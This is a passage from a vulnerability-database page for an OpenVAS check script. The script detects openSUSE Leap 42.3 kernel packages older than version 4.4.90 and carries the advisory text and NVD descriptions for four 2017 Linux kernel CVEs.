Search...

openSUSE: Security Advisory for kernel (openSUSE-SU-2017:2741-1)

2017-10-18T00:00:00

ID OPENVAS:1361412562310851629
Type openvas
Reporter Copyright (C) 2017 Greenbone Networks GmbH
Modified 2020-01-31T00:00:00

Description

The remote host is missing an update for the

                                        
                                            # Copyright (C) 2017 Greenbone Networks GmbH
# Text descriptions are largely excerpted from the referenced
# advisory, and are Copyright (C) of their respective author(s)
#
# SPDX-License-Identifier: GPL-2.0-or-later
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.851629");
  script_version("2020-01-31T08:23:39+0000");
  script_tag(name:"last_modification", value:"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)");
  script_tag(name:"creation_date", value:"2017-10-18 16:55:24 +0200 (Wed, 18 Oct 2017)");
  script_cve_id("CVE-2017-1000252", "CVE-2017-12153", "CVE-2017-12154", "CVE-2017-14489");
  script_tag(name:"cvss_base", value:"4.9");
  script_tag(name:"cvss_base_vector", value:"AV:L/AC:L/Au:N/C:N/I:N/A:C");
  script_tag(name:"qod_type", value:"package");
  script_name("openSUSE: Security Advisory for kernel (openSUSE-SU-2017:2741-1)");

  script_tag(name:"summary", value:"The remote host is missing an update for the 'kernel'
  package(s) announced via the referenced advisory.");

  script_tag(name:"vuldetect", value:"Checks if a vulnerable package version is present on the target host.");

  script_tag(name:"insight", value:"The openSUSE Leap 42.3 kernel was updated to 4.4.90 to receive various
  security and bugfixes.

  The following security bugs were fixed:

  - CVE-2017-1000252: The KVM subsystem in the Linux kernel allowed guest OS
  users to cause a denial of service (assertion failure, and hypervisor
  hang or crash) via an out-of bounds guest_irq value, related to
  arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).

  - CVE-2017-14489: The iscsi_if_rx function in
  drivers/scsi/scsi_transport_iscsi.c in the Linux kernel allowed local
  users to cause a denial of service (panic) by leveraging incorrect
  length validation (bnc#1059051).

  - CVE-2017-12153: A security flaw was discovered in the
  nl80211_set_rekey_data() function in net/wireless/nl80211.c in the Linux
  kernel This function did not check whether the required attributes are
  present in a Netlink request. This request can be issued by a user with
  the CAP_NET_ADMIN capability and may result in a NULL pointer
  dereference and system crash (bnc#1058410).

  - CVE-2017-12154: The prepare_vmcs02 function in arch/x86/kvm/vmx.c in the
  Linux kernel did not ensure that the 'CR8-load exiting' and 'CR8-store
  exiting' L0 vmcs02 controls exist in cases where L1 omits the 'use TPR
  shadow' vmcs12 control, which allowed KVM L2 guest OS users to obtain
  read and write access to the hardware CR8 register (bnc#1058507).

  The following non-security bugs were fixed:

  - arc: Re-enable MMU upon Machine Check exception (bnc#1012382).

  - arm64: fault: Route pte translation faults via do_translation_fault
  (bnc#1012382).

  - arm64: Make sure SPsel is always set (bnc#1012382).

  - arm: pxa: add the number of DMA requestor lines (bnc#1012382).

  - arm: pxa: fix the number of DMA requestor lines (bnc#1012382).

  - bcache: correct cache_dirty_target in __update_writeback_rate()
  (bnc#1012382).

  - bcache: Correct return value for sysfs attach errors (bnc#1012382).

  - bcache: do not subtract sectors_to_gc for bypassed IO (bnc#1012382).

  - bcache: fix bch_hprint crash and improve output (bnc#1012382).

  - bcache: fix for gc and write-back race (bnc#1012382).

  - bcache: Fix leak of bdev reference (bnc#1012382).

  - bcache: initialize dirty stripes in flash_dev_run() (bnc#1012382).

  - block: Relax a check in blk_start_queue() (bnc#1012382).

  - bsg-lib: do not free job in bsg_prepare_job (bnc#1012382).

  - btrfs: change how we decide to commit transactions during flushing
  (bsc#1060197).

  - btrfs: fix NULL pointer dereference from free_reloc_roots()
  (bnc#1012382).

  - btrfs: prevent to set invalid default subvolid (bnc#1012382).

  - btrfs ...

  Description truncated, please see the referenced URL(s) for more information.");

  script_tag(name:"affected", value:"Linux Kernel on openSUSE Leap 42.3");

  script_tag(name:"solution", value:"Please install the updated package(s).");

  script_xref(name:"openSUSE-SU", value:"2017:2741-1");
  script_tag(name:"solution_type", value:"VendorFix");
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (C) 2017 Greenbone Networks GmbH");
  script_family("SuSE Local Security Checks");
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/suse", "ssh/login/rpms", re:"ssh/login/release=openSUSELeap42\.3");
  exit(0);
}

include("revisions-lib.inc");
include("pkg-lib-rpm.inc");

release = rpm_get_ssh_release();
if(!release)
  exit(0);

res = "";
report = "";

if(release == "openSUSELeap42.3") {
  if(!isnull(res = isrpmvuln(pkg:"kernel-devel", rpm:"kernel-devel~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-docs", rpm:"kernel-docs~4.4.90~28.2", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-docs-html", rpm:"kernel-docs-html~4.4.90~28.2", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-docs-pdf", rpm:"kernel-docs-pdf~4.4.90~28.2", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-macros", rpm:"kernel-macros~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-source", rpm:"kernel-source~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-source-vanilla", rpm:"kernel-source-vanilla~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-debug", rpm:"kernel-debug~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-debug-base", rpm:"kernel-debug-base~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-debug-base-debuginfo", rpm:"kernel-debug-base-debuginfo~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-debug-debuginfo", rpm:"kernel-debug-debuginfo~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-debug-debugsource", rpm:"kernel-debug-debugsource~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-debug-devel", rpm:"kernel-debug-devel~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-debug-devel-debuginfo", rpm:"kernel-debug-devel-debuginfo~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-default", rpm:"kernel-default~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-default-base", rpm:"kernel-default-base~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-default-base-debuginfo", rpm:"kernel-default-base-debuginfo~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-default-debuginfo", rpm:"kernel-default-debuginfo~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-default-debugsource", rpm:"kernel-default-debugsource~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-default-devel", rpm:"kernel-default-devel~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-obs-build", rpm:"kernel-obs-build~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-obs-build-debugsource", rpm:"kernel-obs-build-debugsource~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-obs-qa", rpm:"kernel-obs-qa~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-syms", rpm:"kernel-syms~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-vanilla", rpm:"kernel-vanilla~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-vanilla-base", rpm:"kernel-vanilla-base~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-vanilla-base-debuginfo", rpm:"kernel-vanilla-base-debuginfo~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-vanilla-debuginfo", rpm:"kernel-vanilla-debuginfo~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-vanilla-debugsource", rpm:"kernel-vanilla-debugsource~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"kernel-vanilla-devel", rpm:"kernel-vanilla-devel~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(report != "") {
    security_message(data:report);
  } else if(__pkg_match) {
    exit(99);
  }
  exit(0);
}

exit(0);

JSON Vulners Source

Initial Source

{"id": "OPENVAS:1361412562310851629", "type": "openvas", "bulletinFamily": "scanner", "title": "openSUSE: Security Advisory for kernel (openSUSE-SU-2017:2741-1)", "description": "The remote host is missing an update for the ", "published": "2017-10-18T00:00:00", "modified": "2020-01-31T00:00:00", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851629", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["2017:2741-1"], "cvelist": ["CVE-2017-14489", "CVE-2017-1000252", "CVE-2017-12153", "CVE-2017-12154"], "lastseen": "2020-01-31T18:27:46", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-12154", "CVE-2017-1000252", "CVE-2017-14489", "CVE-2017-12153"]}, {"type": "suse", "idList": ["SUSE-SU-2017:3165-1", "OPENSUSE-SU-2017:2739-1", "OPENSUSE-SU-2017:2741-1", "SUSE-SU-2017:3267-1", "SUSE-SU-2017:2956-1", "SUSE-SU-2017:2847-1", "SUSE-SU-2017:2869-1"]}, {"type": "nessus", "idList": ["OPENSUSE-2017-1160.NASL", "VIRTUOZZO_VZA-2017-083.NASL", "UBUNTU_USN-3469-2.NASL", "UBUNTU_USN-3469-1.NASL", "SUSE_SU-2017-2847-1.NASL", "SUSE_SU-2017-2869-1.NASL", "FEDORA_2017-E07D7FB18E.NASL", "OPENSUSE-2017-1159.NASL", "VIRTUOZZO_VZA-2017-082.NASL", "FEDORA_2017-7369EA045C.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310873452", "OPENVAS:1361412562310843354", "OPENVAS:1361412562310843376", "OPENVAS:1361412562310851628", "OPENVAS:1361412562311220191498", "OPENVAS:1361412562311220171245", "OPENVAS:1361412562310891099", "OPENVAS:1361412562310873383", "OPENVAS:1361412562310703981", "OPENVAS:1361412562310843358"]}, {"type": "f5", "idList": ["F5:K71796229"]}, {"type": "virtuozzo", "idList": ["VZA-2017-085", "VZA-2017-086", "VZA-2017-082", "VZA-2017-084", "VZA-2017-083"]}, {"type": "fedora", "idList": ["FEDORA:9526C6075D89", "FEDORA:8CACD6083B5B"]}, {"type": "exploitdb", "idList": ["EDB-ID:42932"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:07DF51A414A141989EF9F5989CC324A1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144476"]}, {"type": "zdt", "idList": ["1337DAY-ID-28714"]}, {"type": "ubuntu", "idList": ["USN-3698-1", "USN-3583-1", "USN-3583-2", "USN-3469-1", "USN-3469-2", "USN-3698-2", "USN-3468-1", "USN-3487-1", "USN-3468-2", "USN-3468-3"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:14981E32944F89BB69AF2D0158A379F0"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1099-1:57108", "DEBIAN:DSA-3981-1:0F636"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-3637", "ELSA-2017-3635", "ELSA-2017-3659", "ELSA-2019-4531", "ELSA-2017-3636"]}, {"type": "redhat", "idList": ["RHSA-2019:1946", "RHSA-2018:1130"]}, {"type": "amazon", "idList": ["ALAS-2017-914"]}, {"type": "centos", "idList": ["CESA-2018:1062"]}], "modified": "2020-01-31T18:27:46", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2020-01-31T18:27:46", "rev": 2}, "vulnersScore": 6.9}, "pluginID": "1361412562310851629", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851629\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-10-18 16:55:24 +0200 (Wed, 18 Oct 2017)\");\n script_cve_id(\"CVE-2017-1000252\", \"CVE-2017-12153\", \"CVE-2017-12154\", \"CVE-2017-14489\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for kernel (openSUSE-SU-2017:2741-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The openSUSE Leap 42.3 kernel was updated to 4.4.90 to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel allowed guest OS\n users to cause a denial of service (assertion failure, and hypervisor\n hang or crash) via an out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel allowed local\n users to cause a denial of service (panic) by leveraging incorrect\n length validation (bnc#1059051).\n\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in net/wireless/nl80211.c in the Linux\n kernel This function did not check whether the required attributes are\n present in a Netlink request. This request can be issued by a user with\n the CAP_NET_ADMIN capability and may result in a NULL pointer\n dereference and system crash (bnc#1058410).\n\n - CVE-2017-12154: The prepare_vmcs02 function in arch/x86/kvm/vmx.c in the\n Linux kernel did not ensure that the 'CR8-load exiting' and 'CR8-store\n exiting' L0 vmcs02 controls exist in cases where L1 omits the 'use TPR\n shadow' vmcs12 control, which allowed KVM L2 guest OS users to obtain\n read and write access to the hardware CR8 register (bnc#1058507).\n\n The following non-security bugs were fixed:\n\n - arc: Re-enable MMU upon Machine Check exception (bnc#1012382).\n\n - arm64: fault: Route pte translation faults via do_translation_fault\n (bnc#1012382).\n\n - arm64: Make sure SPsel is always set (bnc#1012382).\n\n - arm: pxa: add the number of DMA requestor lines (bnc#1012382).\n\n - arm: pxa: fix the number of DMA requestor lines (bnc#1012382).\n\n - bcache: correct cache_dirty_target in __update_writeback_rate()\n (bnc#1012382).\n\n - bcache: Correct return value for sysfs attach errors (bnc#1012382).\n\n - bcache: do not subtract sectors_to_gc for bypassed IO (bnc#1012382).\n\n - bcache: fix bch_hprint crash and improve output (bnc#1012382).\n\n - bcache: fix for gc and write-back race (bnc#1012382).\n\n - bcache: Fix leak of bdev reference (bnc#1012382).\n\n - bcache: initialize dirty stripes in flash_dev_run() (bnc#1012382).\n\n - block: Relax a check in blk_start_queue() (bnc#1012382).\n\n - bsg-lib: do not free job in bsg_prepare_job (bnc#1012382).\n\n - btrfs: change how we decide to commit transactions during flushing\n (bsc#1060197).\n\n - btrfs: fix NULL pointer dereference from free_reloc_roots()\n (bnc#1012382).\n\n - btrfs: prevent to set invalid default subvolid (bnc#1012382).\n\n - btrfs ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"Linux Kernel on openSUSE Leap 42.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:2741-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~4.4.90~28.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs-html\", rpm:\"kernel-docs-html~4.4.90~28.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs-pdf\", rpm:\"kernel-docs-pdf~4.4.90~28.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source-vanilla\", rpm:\"kernel-source-vanilla~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base-debuginfo\", rpm:\"kernel-debug-base-debuginfo~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-build\", rpm:\"kernel-obs-build~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-build-debugsource\", rpm:\"kernel-obs-build-debugsource~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-qa\", rpm:\"kernel-obs-qa~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-base\", rpm:\"kernel-vanilla-base~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-base-debuginfo\", rpm:\"kernel-vanilla-base-debuginfo~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~4.4.90~28.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "naslFamily": "SuSE Local Security Checks"}

{"cve": [{"lastseen": "2020-12-09T20:13:19", "description": "The KVM subsystem in the Linux kernel through 4.13.3 allows guest OS users to cause a denial of service (assertion failure, and hypervisor hang or crash) via an out-of bounds guest_irq value, related to arch/x86/kvm/vmx.c and virt/kvm/eventfd.c.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-09-26T05:29:00", "title": "CVE-2017-1000252", "type": "cve", "cwe": ["CWE-617", "CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000252"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:linux:linux_kernel:4.13.3"], "id": "CVE-2017-1000252", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000252", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.13.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:13:21", "description": "A security flaw was discovered in the nl80211_set_rekey_data() function in net/wireless/nl80211.c in the Linux kernel through 4.13.3. This function does not check whether the required attributes are present in a Netlink request. This request can be issued by a user with the CAP_NET_ADMIN capability and may result in a NULL pointer dereference and system crash.", "edition": 6, "cvss3": {"exploitabilityScore": 0.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 4.4, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-09-21T15:29:00", "title": "CVE-2017-12153", "type": "cve", "cwe": ["CWE-476"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12153"], "modified": "2019-10-09T23:22:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:linux:linux_kernel:4.13.3", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2017-12153", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12153", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.13.3:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2020-12-09T20:13:21", "description": "The prepare_vmcs02 function in arch/x86/kvm/vmx.c in the Linux kernel through 4.13.3 does not ensure that the \"CR8-load exiting\" and \"CR8-store exiting\" L0 vmcs02 controls exist in cases where L1 omits the \"use TPR shadow\" vmcs12 control, which allows KVM L2 guest OS users to obtain read and write access to the hardware CR8 register.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.1, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2017-09-26T05:29:00", "title": "CVE-2017-12154", "type": "cve", "cwe": 